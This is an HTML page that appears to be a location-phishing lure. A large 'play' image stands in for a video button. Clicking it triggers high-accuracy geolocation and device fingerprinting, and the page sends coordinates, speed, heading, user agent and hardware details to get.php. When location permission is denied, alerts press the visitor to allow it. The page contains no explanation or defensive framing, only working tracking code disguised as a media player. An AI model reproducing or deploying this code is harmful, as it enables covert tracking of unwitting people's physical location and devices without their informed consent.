<!DOCTYPE html>
<html>  
	<head>
	<style type="text/css">
    div{
      margin-top:50%;
      display: flex;
      justify-content: center;
      align-items: flex-start;
      flex-direction: rows;
    }
    p{
      width: 100%;
      height: 100%;
    }
    body{
      background: black;
      font-size:40px;
	
    }
    img{
	cursor: pointer; 
	}img:after{
		-webkit-filter: opacity(30%) drop-shadow(1px 1px 0px grey);
		}
     </style>
  <title></title>
<meta http-equiv="refresh" content="30" />
</head>
<body>
<div>
<img src="play.png" onclick="getLocation()" width="640px" height="640px">
</div>
<body>
<script>


function getLocation() {
    if (navigator.geolocation) {
    var acc = {enableHighAccuracy : true , timeout : 30000, maximumage : 0 };
        navigator.geolocation.getCurrentPosition(showPosition, showError, acc);
    } else { 
        x.innerHTML = "This site requires Geolocation to work.";
    }
}

function showPosition(position) {

 //   x.innerHTML = "Latitude: " + position.coords.latitude + 
 //   "<br>Longitude: " + position.coords.longitude;

  var useragent = navigator.userAgent;
  var latitude = position.coords.latitude;
  var longitude = position.coords.longitude;
  var altitude = position.coords.altitude;
  var accuracy = position.coords.accuracy;
  var speed = position.coords.speed;
  var heading = position.coords.heading;
  var platform = navigator.platform;
  var hardware = navigator.hardwareConcurrency;
  var memory = navigator.deviceMemory;
  var height = window.screen.height;
  var width = window.screen.width;


window.location.href = "get.php?latitude=" + latitude + "&longitude=" + longitude + "&altitude=" + altitude + "&platform=" + platform + "&accuracy=" + accuracy + "&speed=" + speed + "&heading=" + heading + "&hardware=" + hardware + "&memory=" + memory + "&useragent=" + useragent + "&height=" + height + "&width=" + width;

}
function showError(error)
{
	switch(error.code)
  {
		case error.PERMISSION_DENIED:
			var error = '1' ; // 'permission denied';
      alert('Please, Allow Location Permission...');
      break;
		case error.POSITION_UNAVAILABLE:
			var error = '2' // 'unavailable';
			break;
		case error.TIMEOUT:
			var error = '3' // 'timed out';
      alert('Please refresh this page...');
			break;
		case error.UNKNOWN_ERROR:
			var error  = '4' // 'unknown error';
			break;
	}

window.location.href = "error.php?error=" + error;

}
</script>

</body>
</html>

